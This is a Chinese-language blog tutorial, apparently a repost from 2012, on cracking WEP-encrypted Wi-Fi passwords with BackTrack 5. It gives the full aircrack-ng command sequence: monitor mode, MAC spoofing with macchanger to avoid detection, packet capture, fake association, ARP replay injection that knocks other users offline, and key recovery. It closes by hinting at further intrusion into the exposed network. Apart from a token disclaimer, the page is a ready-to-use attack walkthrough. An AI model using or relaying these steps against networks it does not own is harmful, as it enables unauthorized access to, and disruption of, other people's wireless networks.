您的位置:首页 > 其它

Backtrack破解wi-fi热点密码

2012-05-27 18:08 387 查看
也许您已经知道了在设置无线密码的时候一定要使用WPA加密的方式,因为WEP加密会非常容易被破解,那到底有多容易呢?本文将会告诉你如何用Backtrack轻松破解无线密码。

Backtrack是什么呢?如果你心中有这个疑问,那么你最好去Google一下,因为这里我不打算讲的。但我会提供一个下载地址。

今天这个教程将一步步教您如何通过使用Backtrak系统破解wep加密的 ,但首先,你必须明白知识虽然是一种力量,但拥有知识并不意味着你可以去做非法的事情,一定要切记。知道怎样开锁并不意味着你一定会成为一个小偷,只把这 篇教程当做一种智力练习吧,如果你不能做到这一点,还是请你不要向下看比较好。

其实在互联网上如何破解无线密码的教程非常之多,总结起来,无非是 aircrack-ng、beini(奶瓶)之流,采用的原理就是伪装成无线网内的合法用户,拦截密码。也许你会问,有很多教程比你的容易多了,为什么要用backtrack呢?有几个原因:

Backtrack更专业:它是专门为无线网络安全开发的系统,内部集成了Linux下可用所有黑客工具,不仅破解WEP密码,用它可以完成一整个入侵流程

Backtrack更安全:BT的另一个好处是你被发现的可能性会降低,最起码你可以伪装mac地址

用windows久了,你不烦吗???

你会需要些什么?

除非你是个无线黑客老手,否则这些设备中总会有一个你是要去准备的,下面是你获得这些东西的方法:

无线网卡—这是最重要的设备,一般来说笔记本会内置一个,不过有很多内置的无线网卡性能极差,有时候不能支持air-dump的功能,推荐买一个外接的USB无线网卡。

Backtrack 5 CD 如果你没有这项装备,你有两个选择,一个是刻录一张backtrack cd,另一个使用虚拟机运行Backtrack系统,本站都提供了教程。

一个采用WEP加密的无线网络 信号要达到可以入侵的强度的话,至少在无线AP的60米之内,建议自己搭建,不要去测试别人的,万一你的邻居是个大汉,你岂不是要····

得记几条命令行 这种破解过程需要打入大量的命令行,你可以把他们都发送到你的手机上,随时查看,也可以开着这个页面,无所谓

破解WEP

首先要运行 Konsole,即Backtrack下的命令行,很容易找的,就在面板上

输入这个命令,取得网络接口的列表

airmon-ng这是我得到的结果 ra0,你得到的结果很有可能是不同的,记下这个代号,在后面的命令中代替我使用的 ra0

现在,执行以下命令

airmon-ng stop (interface)

ifconfig (interface) down

macchanger --mac 00:11:22:33:44:55 (interface)

airmon-ng start (interface)

对比我得到的结果,如果相同,那么恭喜你,你已经成功的伪造了你的mac地址为:00:11:22:33:44:55,如果不一样,那么很遗憾,你的网卡不支持。

现在来看看这个无线网,执行

airodump-ng (interface)这个命令会返回周围可用的无线信号,当你找到你要的地址时,按下Ctrl+C 停止侦测,找到你的目标,一定是一个wep加密方式的,记下他的BSSID。

下面我们来看看目标网络中有些什么,抓一些包来看看,执行

airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)channel那里就是填你的网络频道,bssid填写你刚才得到的dssid地址,filename随便填一个。顺便提一句,你可以用 Shift+Insert 组合键在Koncole里黏贴东西的。

让他在这里抓包吧,咱们干点别的,打开另一个Konsole,输入

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)这里的ESSID 就是AP(无线接入点 Access Point)的 SSID,这里是 yoyo 执行这条命令之后,你应该会得到”Association successful”的返回。

好了,快成功了,现在执行

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)这样我们就在制造了一些路由流量, 以便加速我们的破解,几分钟之后,这个命令栏就会疯狂的读写packet, (同时,此无线网内的其他终端应该无法访问互联网) 这时候你可以去干点别的,注意一下 “#Data” 这个栏,当它达到一万左右的时候就差不多了。

接收数据的速度是由你的网卡和网速决定的,不过半个小时一般就足够了。

当你收集到足够多的数据时,就是揭示密码MM真面目的时候了,启动第三个命令行,执行

aircrack-ng -b (bssid) (file name-01.cap)记得你的filename吗?给他加个.cap

如果数据不够,就会返回失败,你就得收集更多的数据重试,如果成功了,就会像下图一样:

无线密码就是 “KEY FOUND.” 旁边的那些字,被我盖住了····

破解了这个密码之后,脆弱的无线内网就暴露在你面前了,接下来(如果你不怀好意的话)该干什么呢?下次再讲。

要是你只想蹭网,那你还不如用beini呢。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: